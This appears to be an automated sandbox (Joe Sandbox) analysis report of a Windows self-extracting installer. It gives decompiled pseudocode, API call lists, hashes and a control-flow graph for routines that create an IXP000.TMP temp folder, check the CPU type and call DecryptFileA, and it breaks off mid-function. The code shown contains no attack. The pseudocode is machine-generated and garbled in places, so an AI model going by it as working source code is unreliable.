                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t47;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                                                                              				_t9 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                              				if( *0x978a38 != 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					_t11 = E00975164(_t52);
                                                                                                                                                                                                                                              					_t53 = _t11;
                                                                                                                                                                                                                                              					if(_t11 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						return E00976CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t14 = E009755A0(_t53); // executed
                                                                                                                                                                                                                                              					if(_t14 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t45 = 0x105;
                                                                                                                                                                                                                                              						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                              						_t43 = 0x105;
                                                                                                                                                                                                                                              						_t40 =  &_v272;
                                                                                                                                                                                                                                              						E0097658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                              						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                              						_t44 = 0;
                                                                                                                                                                                                                                              						if(_t36 != 0) {
                                                                                                                                                                                                                                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                              							_v276 = _t31;
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								_t45 = _t47;
                                                                                                                                                                                                                                              								_t40 = _t31;
                                                                                                                                                                                                                                              								 *0x97a288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                                                              								_v276();
                                                                                                                                                                                                                                              								if(_t47 != _t47) {
                                                                                                                                                                                                                                              									_t40 = 4;
                                                                                                                                                                                                                                              									asm("int 0x29");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						FreeLibrary(_t36);
                                                                                                                                                                                                                                              						_t58 =  *0x978a24 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                                                              							if(_t21 != 0) {
                                                                                                                                                                                                                                              								__eflags =  *0x978a2c - _t44; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									__eflags =  *0x978d48 & 0x000000c0;
                                                                                                                                                                                                                                              									if(( *0x978d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              										_t41 =  *0x979a40; // 0x3, executed
                                                                                                                                                                                                                                              										_t26 = E0097256D(_t41); // executed
                                                                                                                                                                                                                                              										_t44 = _t26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t22 =  *0x978a24; // 0x0
                                                                                                                                                                                                                                              									 *0x979a44 = _t44;
                                                                                                                                                                                                                                              									__eflags = _t22;
                                                                                                                                                                                                                                              									if(_t22 != 0) {
                                                                                                                                                                                                                                              										L26:
                                                                                                                                                                                                                                              										__eflags =  *0x978a38;
                                                                                                                                                                                                                                              										if( *0x978a38 == 0) {
                                                                                                                                                                                                                                              											__eflags = _t22;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												E00974169(__eflags);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t12 = 1;
                                                                                                                                                                                                                                              										goto L17;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags =  *0x979a30 - _t22; // 0x0
                                                                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                                                                              											goto L26;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t25 = E00973BA2(); // executed
                                                                                                                                                                                                                                              										__eflags = _t25;
                                                                                                                                                                                                                                              										if(_t25 == 0) {
                                                                                                                                                                                                                                              											goto L16;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t22 =  *0x978a24; // 0x0
                                                                                                                                                                                                                                              										goto L26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t27 = E00973B26(_t40, _t44);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t43 = 0x4bc;
                                                                                                                                                                                                                                              							E009744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                              							 *0x979124 = E00976285();
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t59 =  *0x979a30 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E0097621E(); // executed
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t49 =  *0x978a24;
                                                                                                                                                                                                                                              				if( *0x978a24 != 0) {
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					_t34 = E00973A3F(_t51);
                                                                                                                                                                                                                                              					_t52 = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E009751E5(_t49) == 0) {
                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t51 =  *0x978a38;
                                                                                                                                                                                                                                              				if( *0x978a38 != 0) {
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x00972f1d
                                                                                                                                                                                                                                              0x00972f28
                                                                                                                                                                                                                                              0x00972f2f
                                                                                                                                                                                                                                              0x00972f3d
                                                                                                                                                                                                                                              0x00972f6c
                                                                                                                                                                                                                                              0x00972f6c
                                                                                                                                                                                                                                              0x00972f71
                                                                                                                                                                                                                                              0x00972f73
                                                                                                                                                                                                                                              0x00973041
                                                                                                                                                                                                                                              0x00973041
                                                                                                                                                                                                                                              0x00973043
                                                                                                                                                                                                                                              0x00973053
                                                                                                                                                                                                                                              0x00973053
                                                                                                                                                                                                                                              0x00972f79
                                                                                                                                                                                                                                              0x00972f80
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972f86
                                                                                                                                                                                                                                              0x00972f86
                                                                                                                                                                                                                                              0x00972f93
                                                                                                                                                                                                                                              0x00972f9e
                                                                                                                                                                                                                                              0x00972fa0
                                                                                                                                                                                                                                              0x00972fa6
                                                                                                                                                                                                                                              0x00972fb8
                                                                                                                                                                                                                                              0x00972fba
                                                                                                                                                                                                                                              0x00972fbe
                                                                                                                                                                                                                                              0x00972fc6
                                                                                                                                                                                                                                              0x00972fcc
                                                                                                                                                                                                                                              0x00972fd4
                                                                                                                                                                                                                                              0x00972fd6
                                                                                                                                                                                                                                              0x00972fd8
                                                                                                                                                                                                                                              0x00972fe0
                                                                                                                                                                                                                                              0x00972fe6
                                                                                                                                                                                                                                              0x00972fee
                                                                                                                                                                                                                                              0x00972ff0
                                                                                                                                                                                                                                              0x00972ff5
                                                                                                                                                                                                                                              0x00972ff5
                                                                                                                                                                                                                                              0x00972fee
                                                                                                                                                                                                                                              0x00972fd4
                                                                                                                                                                                                                                              0x00972ff8
                                                                                                                                                                                                                                              0x00972ffe
                                                                                                                                                                                                                                              0x00973004
                                                                                                                                                                                                                                              0x00973017
                                                                                                                                                                                                                                              0x0097301c
                                                                                                                                                                                                                                              0x00973024
                                                                                                                                                                                                                                              0x00973054
                                                                                                                                                                                                                                              0x0097305a
                                                                                                                                                                                                                                              0x00973065
                                                                                                                                                                                                                                              0x00973065
                                                                                                                                                                                                                                              0x0097306c
                                                                                                                                                                                                                                              0x0097306e
                                                                                                                                                                                                                                              0x00973075
                                                                                                                                                                                                                                              0x0097307a
                                                                                                                                                                                                                                              0x0097307a
                                                                                                                                                                                                                                              0x0097307c
                                                                                                                                                                                                                                              0x00973081
                                                                                                                                                                                                                                              0x00973087
                                                                                                                                                                                                                                              0x00973089
                                                                                                                                                                                                                                              0x009730a1
                                                                                                                                                                                                                                              0x009730a1
                                                                                                                                                                                                                                              0x009730a9
                                                                                                                                                                                                                                              0x009730ab
                                                                                                                                                                                                                                              0x009730ad
                                                                                                                                                                                                                                              0x009730af
                                                                                                                                                                                                                                              0x009730af
                                                                                                                                                                                                                                              0x009730ad
                                                                                                                                                                                                                                              0x009730b6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097308b
                                                                                                                                                                                                                                              0x0097308b
                                                                                                                                                                                                                                              0x00973091
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973093
                                                                                                                                                                                                                                              0x00973098
                                                                                                                                                                                                                                              0x0097309a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097309c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097309c
                                                                                                                                                                                                                                              0x00973089
                                                                                                                                                                                                                                              0x0097305c
                                                                                                                                                                                                                                              0x00973061
                                                                                                                                                                                                                                              0x00973063
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973063
                                                                                                                                                                                                                                              0x0097302b
                                                                                                                                                                                                                                              0x00973032
                                                                                                                                                                                                                                              0x0097303c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097303c
                                                                                                                                                                                                                                              0x00973006
                                                                                                                                                                                                                                              0x0097300c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097300e
                                                                                                                                                                                                                                              0x00973015
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973015
                                                                                                                                                                                                                                              0x00972f80
                                                                                                                                                                                                                                              0x00972f3f
                                                                                                                                                                                                                                              0x00972f46
                                                                                                                                                                                                                                              0x00972f5f
                                                                                                                                                                                                                                              0x00972f5f
                                                                                                                                                                                                                                              0x00972f64
                                                                                                                                                                                                                                              0x00972f66
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972f66
                                                                                                                                                                                                                                              0x00972f4f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972f55
                                                                                                                                                                                                                                              0x00972f5d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00972F93
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00972FB2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00972FC6
                                                                                                                                                                                                                                              • DecryptFileA.ADVAPI32 ref: 00972FE6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00972FF8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097301C
                                                                                                                                                                                                                                                • Part of subcall function 009751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00972F4D,?,00000002,00000000), ref: 00975201
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 2126469477-1173327654
                                                                                                                                                                                                                                              • Opcode ID: a0bddac08f4cc641256d52fa32646f8a53dcbc9631c0a71febcd925dbe71cdf7
                                                                                                                                                                                                                                              • Instruction ID: dfa544c9ee34829a2f0fd9f2696fa42cd0f2b5cab4841b87aafb8820de76a782
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0bddac08f4cc641256d52fa32646f8a53dcbc9631c0a71febcd925dbe71cdf7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C41D133A242058ADB34AB35AD4A76A33ACDBC5B51F10C475E94DC2191EF74CEC0EA61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 522 975467-975484 523 97551c-975528 call 971680 522->523 524 97548a-975490 call 9753a1 522->524 527 97552d-975539 call 9758c8 523->527 528 975495-975497 524->528 537 97554d-975552 527->537 538 97553b-975545 CreateDirectoryA 527->538 529 975581-975583 528->529 530 97549d-9754c0 call 971781 528->530 532 97558d-97559d call 976ce0 529->532 539 9754c2-9754d8 GetSystemInfo 530->539 540 97550c-97551a call 97658a 530->540 544 975585-97558b 537->544 545 975554-975557 call 97597d 537->545 542 975577-97557c call 976285 538->542 543 975547 538->543 546 9754fe 539->546 547 9754da-9754dd 539->547 540->527 542->529 543->537 544->532 553 97555c-97555e 545->553 554 975503-975507 call 97658a 546->554 551 9754f7-9754fc 547->551 552 9754df-9754e2 547->552 551->554 557 9754e4-9754e7 552->557 558 9754f0-9754f5 552->558 553->544 559 975560-975566 553->559 554->540 557->540 561 9754e9-9754ee 557->561 558->554 559->529 562 975568-975575 RemoveDirectoryA 559->562 561->554 562->529
                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00975467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR* _t48;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t10 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				if(__edx == 0) {
                                                                                                                                                                                                                                              					_t48 = 0x9791e4;
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E00971680(0x9791e4, 0x104);
                                                                                                                                                                                                                                              					L14:
                                                                                                                                                                                                                                              					_t13 = E009758C8(_t48); // executed
                                                                                                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						_t42 = _a4;
                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							 *0x979124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                                                              							return E00976CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t16 = E0097597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t61 =  *0x978a20; // 0x0
                                                                                                                                                                                                                                              						if(_t61 != 0) {
                                                                                                                                                                                                                                              							 *0x978a20 = 0;
                                                                                                                                                                                                                                              							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L22:
                                                                                                                                                                                                                                              						_t14 = 0;
                                                                                                                                                                                                                                              						goto L24;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                              						 *0x979124 = E00976285();
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x978a20 = 1;
                                                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 =  &_v268;
                                                                                                                                                                                                                                              				_t20 = E009753A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t48 = 0x9791e4;
                                                                                                                                                                                                                                              				E00971781(0x9791e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                              				if(( *0x979a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E0097658A(_t48, 0x104, 0x971140);
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                              				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					_push("i386");
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					E0097658A(_t48, 0x104);
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = _t26 - 1;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					_push("mips");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = _t28 - 1;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					_push("alpha");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t29 != 1) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push("ppc");
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}




















                                                                                                                                                                                                                                              0x00975472
                                                                                                                                                                                                                                              0x00975479
                                                                                                                                                                                                                                              0x00975481
                                                                                                                                                                                                                                              0x00975484
                                                                                                                                                                                                                                              0x0097551c
                                                                                                                                                                                                                                              0x00975521
                                                                                                                                                                                                                                              0x00975528
                                                                                                                                                                                                                                              0x0097552d
                                                                                                                                                                                                                                              0x0097552f
                                                                                                                                                                                                                                              0x00975539
                                                                                                                                                                                                                                              0x0097554d
                                                                                                                                                                                                                                              0x0097554d
                                                                                                                                                                                                                                              0x00975552
                                                                                                                                                                                                                                              0x00975585
                                                                                                                                                                                                                                              0x00975585
                                                                                                                                                                                                                                              0x0097558b
                                                                                                                                                                                                                                              0x0097558d
                                                                                                                                                                                                                                              0x0097559d
                                                                                                                                                                                                                                              0x0097559d
                                                                                                                                                                                                                                              0x00975557
                                                                                                                                                                                                                                              0x0097555e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975560
                                                                                                                                                                                                                                              0x00975566
                                                                                                                                                                                                                                              0x00975569
                                                                                                                                                                                                                                              0x0097556f
                                                                                                                                                                                                                                              0x0097556f
                                                                                                                                                                                                                                              0x00975581
                                                                                                                                                                                                                                              0x00975581
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975581
                                                                                                                                                                                                                                              0x00975545
                                                                                                                                                                                                                                              0x0097557c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097557c
                                                                                                                                                                                                                                              0x00975547
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975547
                                                                                                                                                                                                                                              0x0097548a
                                                                                                                                                                                                                                              0x00975490
                                                                                                                                                                                                                                              0x00975497
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097549d
                                                                                                                                                                                                                                              0x009754ab
                                                                                                                                                                                                                                              0x009754b4
                                                                                                                                                                                                                                              0x009754c0
                                                                                                                                                                                                                                              0x0097550c
                                                                                                                                                                                                                                              0x00975511
                                                                                                                                                                                                                                              0x00975515
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975515
                                                                                                                                                                                                                                              0x009754c9
                                                                                                                                                                                                                                              0x009754d6
                                                                                                                                                                                                                                              0x009754d8
                                                                                                                                                                                                                                              0x009754fe
                                                                                                                                                                                                                                              0x00975503
                                                                                                                                                                                                                                              0x00975507
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975507
                                                                                                                                                                                                                                              0x009754da
                                                                                                                                                                                                                                              0x009754dd
                                                                                                                                                                                                                                              0x009754f7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009754f7
                                                                                                                                                                                                                                              0x009754df
                                                                                                                                                                                                                                              0x009754e2
                                                                                                                                                                                                                                              0x009754f0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009754f0
                                                                                                                                                                                                                                              0x009754e7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009754e9
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009754C9
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097553D
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097556F
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009753FB
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975402
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097541F
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097542B
                                                                                                                                                                                                                                                • Part of subcall function 009753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975434
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                              • API String ID: 1979080616-3374052426
                                                                                                                                                                                                                                              • Opcode ID: 17c5421ee127b51727507889dfbb9679d7fe4422b08fc26d7d919f5334a312d3
                                                                                                                                                                                                                                              • Instruction ID: 6e9ef8b345a2a65a747774bead43e8d182207f23ead106752f47063e6b58fdc6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17c5421ee127b51727507889dfbb9679d7fe4422b08fc26d7d919f5334a312d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA314773B14A055BCB90AB399D05A7F739EABC2304B06C03AB40EC2590DBF4CE41D699
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00972390(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				char _v284;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
